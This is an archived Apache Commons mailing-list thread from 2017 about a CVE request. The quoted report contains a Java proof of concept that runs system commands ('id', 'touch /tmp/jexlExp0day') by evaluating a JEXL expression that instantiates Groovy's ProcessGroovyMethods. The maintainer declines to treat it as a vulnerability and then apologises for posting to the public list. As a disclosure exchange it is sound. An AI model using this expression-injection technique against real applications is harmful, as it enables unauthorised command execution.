You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@commons.apache.org by Mark Thomas <ma...@apache.org> on 2017/04/24 16:29:59 UTC
Re: CVE request for : Apache Commons JEXL Expression Execute Command
Vulnerabilitity throught groovy.
The Apache Commons project will not be treating this as a security
vulnerability. Executing untrusted / unsanitized / unvalidated code in a
scripting environment is always dangerous.
Progress may be followed via:
https://issues.apache.org/jira/browse/JEXL-223
Mark
On 21/04/17 08:52, Cloudsecintel wrote:
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught
> groovy.
>
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
>
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
>
> public class elExp {
> public static void main(String args[]) throws IOException {
> // Create or retrieve an engine
> JexlEngine jexl = new JexlBuilder().create();
> // Create an expression
> //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
> ProcessGroovyMethods n = new ProcessGroovyMethods();
> System.out.println(n.execute("id").toString());
> String jexlExp =
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
> /tmp/jexlExp0day\")";
> JexlExpression e = jexl.createExpression( jexlExp );
> try {
>
> Process process = new ProcessBuilder("id").start();
> } catch (IOException e1) {
> // TODO Auto-generated catch block
> e1.printStackTrace();
> }
> // Create a context and add data
> JexlContext jc = new MapContext();
> jc.set("foo", jexlExp );
>
> // Now evaluate the expression, getting the result
> Object o = e.evaluate(jc);
> System.out.println(o);
> }
> }
> {code}
>
> Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email.
>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org
Re: CVE request for : Apache Commons JEXL Expression Execute Command
Vulnerabilitity throught groovy.
Posted by Mark Thomas <ma...@apache.org>.
(all addressees apart from dev@commons.a.o moved to bcc)
All,
My apologies.
I intended to send this to the Commons PMC's private list and put the
wrong addressee for the Commons project.
Fortunately the issue is already largely public at
https://issues.apache.org/jira/browse/JEXL-223 but even so, this message
should not have been sent to the public dev list.
Again, my apologies for my error.
Mark
On 24/04/17 17:29, Mark Thomas wrote:
<snip/>
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org